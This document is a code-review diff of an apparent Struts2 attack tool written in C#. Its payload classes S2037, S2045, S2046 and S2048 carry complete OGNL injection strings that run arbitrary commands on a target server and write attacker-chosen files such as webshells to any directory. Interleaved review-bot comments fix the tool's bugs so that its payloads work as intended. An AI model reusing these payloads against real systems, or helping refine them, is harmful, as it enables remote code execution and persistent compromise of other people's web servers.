private String Exp_Exec = "(%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd[0]).getInputStream()).useDelimiter(%23parameters.pp[0]),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp[0],%23w.print(%23str),%23w.close()):xx.toString.json&cmd=[cmd]&pp=\\\\AAAA&ppp=%20&encoding=UTF-8";
- private String Exp_Upload = "(%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23path%3d%23req.getRealPath(%23parameters.pp[0]),new%20java.io.BufferedWriter(new%20java.io.FileWriter(%23path%2b%23parameters.shellname[0]).append(%23parameters.shellContent[0])).close(),%23w.print(%23parameters.info1[0]),%23w.print(%23parameters.info2[0]),%23w.print(%23req.getContextPath()),%23w.close()):xx.toString.json&shellname=[filename]&shellContent=[filecontent]&encoding=UTF-8&pp=%2f&info1=oko&info2=kok%2f";
- private String Exp_Upload_Path= "(%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23path%3d%23req.getRealPath(%23parameters.pp[0]),new%20java.io.BufferedWriter(new%20java.io.FileWriter(%23parameters.shellname[0]).append(%23parameters.shellContent[0])).close(),%23w.print(%23parameters.info1[0]),%23w.print(%23parameters.info2[0]),%23w.print(%23req.getContextPath()),%23w.close()):xx.toString.json&shellname=[path]&shellContent=[filecontent]&encoding=UTF-8&pp=%2f&info1=oko&info2=kok%2f";
+ private String Exp_Upload = "(%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23path%3d%23req.getRealPath(%23parameters.pp[0]),new%20java.io.BufferedWriter(new%20java.io.FileWriter(%23path%2b%23parameters.shellname[0]).append(%23parameters.shellContent[0])).close(),%23w.print(%23parameters.info1[0]),%23w.print(%23parameters.info2[0]),%23w.print(%23req.getContextPath()),%23w.close()):xx.toString.json&shellname=[pathfilename]&shellContent=[filecontent]&encoding=UTF-8&pp=%2f&info1=oko&info2=kok%2f";
+ private String Exp_Upload_Path= "(%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),new+java.io.File%28%23parameters.path[0]%29.mkdirs%28%29,new%20java.io.BufferedWriter(new%20java.io.FileWriter(%23parameters.shellname[0]).append(%23parameters.shellContent[0])).close(),%23w.print(%23parameters.info1[0]),%23w.print(%23parameters.info2[0]),%23w.print(%23req.getContextPath()),%23w.close()):xx.toString.json&path=[path]&shellname=[pathfilename]&shellContent=[filecontent]&encoding=UTF-8&pp=%2f&info1=oko&info2=kok%2f";
public String Get_Exp_Check()
{
return this.Exp_Check;
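Review bot: With the `#path=#req.getRealPath(#parameters.pp[0])` assignment dropped from `Exp_Upload_Path` (L702), the trailing `&pp=%2f` parameter in that template no longer serves any purpose and should be removed, or a comment should say why it is kept; S2032's version of this same change still carries the assignment, so the two files now disagree on shape. `mkdirs()`'s return value is ignored, so a directory that cannot be created is reported only through the later `FileWriter` failure; acceptable, but worth a `// mkdirs result ignored on purpose: FileWriter will fail loudly` note on the field.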
@@ -31,12 +31,15 @@ public String Get_Exp_Upload(String path,String fileName,String fileContent)
{
if ("".Equals(path))
{
- this.Exp_Upload = this.Exp_Upload.Replace("[filename]", fileName);
+ this.Exp_Upload = this.Exp_Upload.Replace("[pathfilename]", fileName);
+ return this.Exp_Upload.Replace("[filecontent]", fileContent);
}
else {
this.Exp_Upload_Path = this.Exp_Upload_Path.Replace("[path]", path);
+ this.Exp_Upload_Path = this.Exp_Upload_Path.Replace("[pathfilename]", path+"/"+ fileName);
+ return this.Exp_Upload_Path.Replace("[filecontent]", fileContent);
}
- return this.Exp_Upload.Replace("[filecontent]", fileContent);
+
}
}
}
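Review bot: The `"".Equals(path)` test (L708) sends a null `path` into the custom-directory branch, where `path+"/"+fileName` (L716) becomes `/name` and `mkdirs()` is asked to create a root-level directory on the target; `string.IsNullOrEmpty(path)` is the intended check. Lines 711 and 715–716 also assign the substituted payload back into the template fields, so the second `Get_Exp_Upload` on the same `S2037` instance finds no placeholders and returns the first call's target; build into a local with chained `.Replace` calls and leave the fields untouched. The values are sent as separate request parameters, which is the right shape, but they still need `Uri.EscapeDataString` before going into the query string.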
diff --git a/Test/payload/S2045.cs b/Test/payload/S2045.cs
index 101456e..ba760c3 100644
--- a/Test/payload/S2045.cs
+++ b/Test/payload/S2045.cs
@@ -17,7 +17,8 @@ public class S2045:BasePayload
//private String Exp_Upload = "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(new java.io.BufferedWriter(new java.io.FileWriter([path])).append(#req.getHeader('test')).close()).(#res.getWriter().print('oko')).(#res.getWriter().print('kok/')).(#res.getWriter().print(#req.getContextPath())).(#res.getWriter().flush()).(#res.getWriter().close())}";
//private String Exp_Upload = "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(new java.io.BufferedWriter(new java.io.FileWriter([path])).append(new java.net.URLDecoder().decode(#req.getHeader('test'),'UTF-8')).close()).(#res.getWriter().print('oko')).(#res.getWriter().print('kok/')).(#res.getWriter().print(#req.getContextPath())).(#res.getWriter().flush()).(#res.getWriter().close())}";
//大文件
- private String Exp_Upload = "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(#fs=new java.io.FileOutputStream([path])).(#out=#res.getOutputStream()).(@org.apache.commons.io.IOUtils@copy(#req.getInputStream(),#fs)).(#fs.close()).(#out.print('oko')).(#out.print('kok/')).(#out.print(#req.getContextPath())).(#out.close())}";
+ private String Exp_Upload = "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(#fs=new java.io.FileOutputStream(#req.getSession().getServletContext().getRealPath('/[pathfilename]'))).(#out=#res.getOutputStream()).(@org.apache.commons.io.IOUtils@copy(#req.getInputStream(),#fs)).(#fs.close()).(#out.print('oko')).(#out.print('kok/')).(#out.print(#req.getContextPath())).(#out.close())}";
+ private String Exp_SetMyUpload = "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(new java.io.File('[path]').mkdirs()).(#fs=new java.io.FileOutputStream('[pathfilename]')).(#out=#res.getOutputStream()).(@org.apache.commons.io.IOUtils@copy(#req.getInputStream(),#fs)).(#fs.close()).(#out.print('oko')).(#out.print('kok/')).(#out.print(#req.getContextPath())).(#out.close())}";
public String Get_Exp_Check()
{
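Review bot: `Exp_SetMyUpload` (L734) places `[path]` and `[pathfilename]` directly inside OGNL single-quoted literals (`new java.io.File('[path]')`, `new java.io.FileOutputStream('[pathfilename]')`), and `Exp_Upload` (L733) does the same with `getRealPath('/[pathfilename]')`, so a `'` or a Windows backslash in what the user types breaks the expression at parse time. Either escape `\` and `'` in `Get_Exp_Upload` before substitution, or carry the values in a request header or parameter the expression reads, as S2032/S2037 do with `#parameters.path[0]` and the commented-out `#req.getHeader('test')` variants above do for content. `mkdirs()` is evaluated for its side effect only; a short comment on the field stating that a false result is expected to surface as a `FileOutputStream` failure would help the next reader.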
@@ -38,13 +39,15 @@ public String Get_Exp_Upload(String path,String fileName,String fileContent)
{
if ("".Equals(path))
{
- path = "#req.getSession().getServletContext().getRealPath('/"+fileName+"')";
- this.Exp_Upload = this.Exp_Upload.Replace("[path]", path);
+ this.Exp_Upload = this.Exp_Upload.Replace("[pathfilename]", fileName);
+ return this.Exp_Upload.Replace("[filecontent]", fileContent);
}
else {
- this.Exp_Upload = this.Exp_Upload.Replace("[path]", "'"+path+ "'");
+ this.Exp_SetMyUpload = this.Exp_Upload.Replace("[path]", path);
+ this.Exp_SetMyUpload = this.Exp_Upload.Replace("[pathfilename]", path+"/"+ fileName);
+ return this.Exp_SetMyUpload.Replace("[filecontent]", fileContent);
}
- return this.Exp_Upload.Replace("[filecontent]", fileContent);
+
}
}
}
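Review bot: Lines 748–749 call `.Replace` on `this.Exp_Upload` rather than `this.Exp_SetMyUpload`, so the mkdirs payload defined at L734 is never used: `Exp_Upload` contains no `[path]` placeholder, the first assignment is immediately overwritten by the second, and the custom directory ends up inside `getRealPath('/<path>/<file>')`, i.e. relative to the webroot rather than the absolute location the new `setUploudPath` checkbox implies. The fix is `this.Exp_SetMyUpload = this.Exp_SetMyUpload.Replace("[path]", path);` followed by `this.Exp_SetMyUpload = this.Exp_SetMyUpload.Replace("[pathfilename]", path + "/" + fileName);`. S2019's version of this method in the same commit has it right, so the two should be brought in line.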
diff --git a/Test/payload/S2046.cs b/Test/payload/S2046.cs
index c2fa634..38dcdae 100644
--- a/Test/payload/S2046.cs
+++ b/Test/payload/S2046.cs
@@ -13,7 +13,9 @@ public class S2046:BasePayload
private String Exp_Exec = "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(#s=new java.util.Scanner((new java.lang.ProcessBuilder('[cmd]'.toString().split('\\\\s'))).start().getInputStream()).useDelimiter('\\\\AAAA')).(#str=#s.hasNext()?#s.next():'').(#res.getWriter().print(#str)).(#res.getWriter().flush()).(#res.getWriter().close()).(#s.close())}\0b";
- private String Exp_Upload = "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(#filecontent='[content]').(new java.io.BufferedWriter(new java.io.FileWriter([path])).append(new java.net.URLDecoder().decode(#filecontent,'UTF-8')).close()).(#res.getWriter().print('oko')).(#res.getWriter().print('kok/')).(#res.getWriter().print(#req.getContextPath())).(#res.getWriter().flush()).(#res.getWriter().close())}\0b";
+ private String Exp_Upload = "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(#filecontent='[content]').(new java.io.BufferedWriter(new java.io.FileWriter(#req.getSession().getServletContext().getRealPath('/[pathfilename]'))).append(new java.net.URLDecoder().decode(#filecontent,'UTF-8')).close()).(#res.getWriter().print('oko')).(#res.getWriter().print('kok/')).(#res.getWriter().print(#req.getContextPath())).(#res.getWriter().flush()).(#res.getWriter().close())}\0b";
+
+ private String Exp_SetMyUpload = "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(#filecontent='[content]').(new java.io.File('[path]').mkdirs()).(new java.io.BufferedWriter(new java.io.FileWriter('[pathfilename]')).append(new java.net.URLDecoder().decode(#filecontent,'UTF-8')).close()).(#res.getWriter().print('oko')).(#res.getWriter().print('kok/')).(#res.getWriter().print(#req.getContextPath())).(#res.getWriter().flush()).(#res.getWriter().close())}\0b";
public String Get_Exp_Check()
{
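Review bot: `Exp_SetMyUpload` (L766) embeds `[path]` and `[pathfilename]` inside OGNL single-quoted literals, so a `'` or a Windows backslash in the user-chosen directory corrupts the expression; `Exp_Upload` (L764) has the same exposure for `[pathfilename]` inside `getRealPath('/[pathfilename]')`. Escape `\` and `'` in `Get_Exp_Upload` before substitution, or pass the values through a request header/parameter as the `#parameters.path[0]` form in S2032/S2037 does. The content placeholder in both templates is `[content]` while `Get_Exp_Upload` substitutes `[filecontent]`; that mismatch predates this commit, so presumably `[content]` is filled in elsewhere, and a comment on the field saying where would prevent the next reader from treating it as a bug.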
@@ -34,13 +36,16 @@ public String Get_Exp_Upload(String path,String fileName,String fileContent)
{
if ("".Equals(path))
{
- path = "#req.getSession().getServletContext().getRealPath('/"+fileName+"')";
- this.Exp_Upload = this.Exp_Upload.Replace("[path]", path);
+ this.Exp_Upload = this.Exp_Upload.Replace("[pathfilename]", fileName);
+ return this.Exp_Upload.Replace("[filecontent]", fileContent);
}
- else {
- this.Exp_Upload = this.Exp_Upload.Replace("[path]", "'"+path+ "'");
+ else
+ {
+ this.Exp_SetMyUpload = this.Exp_Upload.Replace("[path]", path);
+ this.Exp_SetMyUpload = this.Exp_Upload.Replace("[pathfilename]", path + "/" + fileName);
+ return this.Exp_SetMyUpload.Replace("[filecontent]", fileContent);
}
- return this.Exp_Upload.Replace("[filecontent]", fileContent);
+
}
}
}
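Review bot: Lines 782–783 substitute into `this.Exp_Upload` instead of `this.Exp_SetMyUpload`, so the mkdirs template added at L766 is never emitted: `Exp_Upload` has no `[path]` placeholder, the first assignment is overwritten by the second, and the user's directory is written under the webroot via `getRealPath('/<path>/<file>')` instead of the absolute path the new checkbox promises. Change both lines to `this.Exp_SetMyUpload = this.Exp_SetMyUpload.Replace("[path]", path);` and `this.Exp_SetMyUpload = this.Exp_SetMyUpload.Replace("[pathfilename]", path + "/" + fileName);`. S2045 in this same commit has the identical slip, while S2019's version is correct.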
diff --git a/Test/payload/S2048.cs b/Test/payload/S2048.cs
index 8489874..01fc485 100644
--- a/Test/payload/S2048.cs
+++ b/Test/payload/S2048.cs
@@ -19,7 +19,9 @@ public class S2048:BasePayload
//private String Exp_Upload = "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(new java.io.BufferedWriter(new java.io.FileWriter([path])).append(#req.getHeader('test')).close()).(#res.getWriter().print('oko')).(#res.getWriter().print('kok/')).(#res.getWriter().print(#req.getContextPath())).(#res.getWriter().flush()).(#res.getWriter().close())}";
//private String Exp_Upload = "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(new java.io.BufferedWriter(new java.io.FileWriter([path])).append(new java.net.URLDecoder().decode(#req.getHeader('test'),'UTF-8')).close()).(#res.getWriter().print('oko')).(#res.getWriter().print('kok/')).(#res.getWriter().print(#req.getContextPath())).(#res.getWriter().flush()).(#res.getWriter().close())}";
//大文件
- private String Exp_Upload = "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(#res.getWriter().print('start:')).(#fs=new java.io.FileOutputStream([path])).(#out=#res.getOutputStream()).(@org.apache.commons.io.IOUtils@copy(#req.getInputStream(),#fs)).(#fs.close()).(#out.print('oko')).(#out.print('kok/:end')).(#out.print(#req.getContextPath())).(#out.close())}";
+ private String Exp_Upload = "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(#res.getWriter().print('start:')).(#fs=new java.io.FileOutputStream(#req.getSession().getServletContext().getRealPath('/[pathfilename]'))).(#out=#res.getOutputStream()).(@org.apache.commons.io.IOUtils@copy(#req.getInputStream(),#fs)).(#fs.close()).(#out.print('oko')).(#out.print('kok/:end')).(#out.print(#req.getContextPath())).(#out.close())}";
+
+ private String Exp_SetMyUpload = "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(#res.getWriter().print('start:')).(new java.io.File('[path]').mkdirs()).(#fs=new java.io.FileOutputStream('[pathfilename]')).(#out=#res.getOutputStream()).(@org.apache.commons.io.IOUtils@copy(#req.getInputStream(),#fs)).(#fs.close()).(#out.print('oko')).(#out.print('kok/:end')).(#out.print(#req.getContextPath())).(#out.close())}";
public String Get_Exp_Check()
{
@@ -41,16 +43,18 @@ public String Get_Exp_Exec(String cmd)
}
public String Get_Exp_Upload(String path,String fileName,String fileContent)
{
+ String data = "";
if ("".Equals(path))
{
- path = "#req.getSession().getServletContext().getRealPath('/"+fileName+"')";
- this.Exp_Upload = this.Exp_Upload.Replace("[path]", path);
+ this.Exp_Upload = this.Exp_Upload.Replace("[pathfilename]", fileName);
+ data= this.Exp_Upload.Replace("[filecontent]", fileContent);
}
- else {
- this.Exp_Upload = this.Exp_Upload.Replace("[path]", "'"+path+ "'");
+ else
+ {
+ this.Exp_SetMyUpload = this.Exp_Upload.Replace("[path]", path);
+ this.Exp_SetMyUpload = this.Exp_Upload.Replace("[pathfilename]", path + "/" + fileName);
+ data=this.Exp_SetMyUpload.Replace("[filecontent]", fileContent);
}
- String data =this.Exp_Upload.Replace("[filecontent]", fileContent);
-
return String.Format("name={0}&age=a&__checkbox_bustedBefore=true&description=s", System.Web.HttpUtility.UrlEncode(data));
}
}
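Review bot: `String data = "";` at the top of Get_Exp_Upload carries a dead initializer, since both the `if` and `else` branches assign `data` unconditionally before it is read on the `String.Format` line. Declaring it as `String data;` lets the compiler's definite-assignment check enforce that every branch sets it, which is the idiomatic form when a local is always written before use. The sibling version of this method in the first file section returns directly from each branch instead of going through a local, and the two should settle on one shape for consistency.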